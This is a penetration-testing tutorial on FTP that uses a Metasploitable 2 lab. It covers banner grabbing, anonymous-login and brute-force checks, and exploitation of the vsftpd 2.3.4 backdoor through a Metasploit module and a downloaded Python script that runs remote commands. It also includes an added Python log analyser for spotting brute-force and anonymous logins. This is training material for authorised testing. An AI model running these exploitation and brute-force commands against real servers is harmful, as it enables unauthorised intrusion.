FTP Service Penetration Testing

Hello everyone! Welcome to pentestguy. In this post we discuss FTP service penetration testing. FTP is one of the most common services a tester encounters, and here we walk through some common ways of testing it, covering both identification and exploitation.

What is FTP?

FTP stands for File Transfer Protocol, which transfers files from one system to another. The default port for FTP is 21, but remember that the user/admin can change it. Some of the most common FTP applications are FileZilla, vsftpd, and Core FTP.

With FTP, as with any other service such as SSH, the tester follows a fixed flow: check the version, try default credentials, and check for existing vulnerabilities in the respective version. For the practical demonstrations we use Metasploitable 2 as our playground.

Check for Version/Banner grabbing

Banner grabbing is a technique for getting information about a computer, such as the services running on a specific port. With Netcat or Nmap we can easily grab the version and then check that version for known vulnerabilities.

nc 192.168.X.X 21
In the example above, we identify the FTP version using netcat.
nmap -sV -p 21 192.168.X.X
In the example above, nmap is used to detect the version.

Check for anonymous users allowed

Anonymous login is one of the most common issues in an FTP service, caused by misconfiguration or, put another way, by default configurations left in place. We can test this directly by logging in as the anonymous user, or check it with Nmap using the ftp-anon.nse script.
All NSE scripts are described in the Nmap documentation: https://nmap.org/book/nse.html

nmap --script ftp-anon.nse -p 21 192.168.X.X
The ftp-anon.nse script detects whether anonymous login is allowed.
ftp 192.168.X.X
Log in as the anonymous user.

Check for brute force

In many cases, users employ default or easily guessable passwords that appear in common wordlists. Several tools can test for this, such as nmap, hydra, and metasploit-framework.

nmap --script ftp-brute -p 21 192.168.X.X
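On the defending side, both the anonymous-login check and the brute-force check leave traces in the server log. The following Python sketch is an added example, not part of the original post: it scans vsftpd-style login lines for anonymous logins, bursts of failed logins from one client, and any success that follows a burst. The log layout, sample lines, threshold and function names are assumptions made for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed layout of vsftpd's own log (vsftpd.log), not the xferlog format.
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

# Constructed sample lines; the addresses come from documentation ranges.
SAMPLE_LOG = """\
Tue Mar  5 10:12:00 2024 [pid 2101] CONNECT: Client "192.0.2.10"
Tue Mar  5 10:12:02 2024 [pid 2100] [admin] FAIL LOGIN: Client "192.0.2.10"
Tue Mar  5 10:12:05 2024 [pid 2102] [admin] FAIL LOGIN: Client "192.0.2.10"
Tue Mar  5 10:12:09 2024 [pid 2104] [root] FAIL LOGIN: Client "192.0.2.10"
Tue Mar  5 10:12:12 2024 [pid 2106] [user] FAIL LOGIN: Client "192.0.2.10"
Tue Mar  5 10:12:15 2024 [pid 2108] [backup] FAIL LOGIN: Client "192.0.2.10"
Tue Mar  5 10:12:19 2024 [pid 2110] [backup] OK LOGIN: Client "192.0.2.10"
Tue Mar  5 10:20:41 2024 [pid 2120] [ftp] OK LOGIN: Client "198.51.100.7", anon password "x@example.org"
Tue Mar  5 10:31:07 2024 [pid 2130] [alice] FAIL LOGIN: Client "192.0.2.20"
Tue Mar  5 10:31:30 2024 [pid 2131] [alice] OK LOGIN: Client "192.0.2.20"
"""

def parse(log_text):
    """Yield (timestamp, user, ok, ip) for each login line; skip other lines."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
            yield ts, m["user"], m["result"] == "OK", m["ip"]

def analyse(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return (brute_force_ips, anonymous_logins, successes_after_burst)."""
    fails = defaultdict(list)            # ip -> recent failure timestamps
    brute, anon, hits = set(), [], []
    for ts, user, ok, ip in parse(log_text):
        if ok:
            if user.lower() in ("ftp", "anonymous"):
                anon.append((ip, ts))    # anonymous access is enabled
            elif ip in brute:
                hits.append((ip, user))  # a guess probably succeeded
            continue
        # Keep only failures inside the sliding window, then add this one.
        fails[ip] = [t for t in fails[ip] if ts - t <= window] + [ts]
        if len(fails[ip]) >= threshold:
            brute.add(ip)
    return brute, anon, hits
```

A single mistyped password, like the constructed `alice` entry, stays below the threshold and is not flagged; an account that logs in right after a burst should have its password reset.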

Check for Vulnerabilities and Exploitation

After version detection, an attacker can search for existing vulnerabilities in that specific version in different ways, such as with searchsploit or a simple Google search.

Searchsploit is a tool that uses exploit-db data to find exploits for a given piece of software.

searchsploit -t vsftpd

Once we know an existing vulnerability is present, we can search for an exploit for it. There are different ways to exploit a vulnerability: using an automated framework or script, or doing it manually. Here we use an automated framework, metasploit-framework, and also a Python script for the same vulnerability.

msfconsole -q
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set rhosts 192.168.X.X
exploit

The method below uses a Python exploit script, which requires python3. Download it from https://github.com/ahervias77/vsftpd-2.3.4-exploit and run the command given below.

python3 vsftpd_234_exploit.py 192.168.X.X 21 whoami

There may be other exploits worth trying, depending on the situation. We hope this covers almost all of the ways.
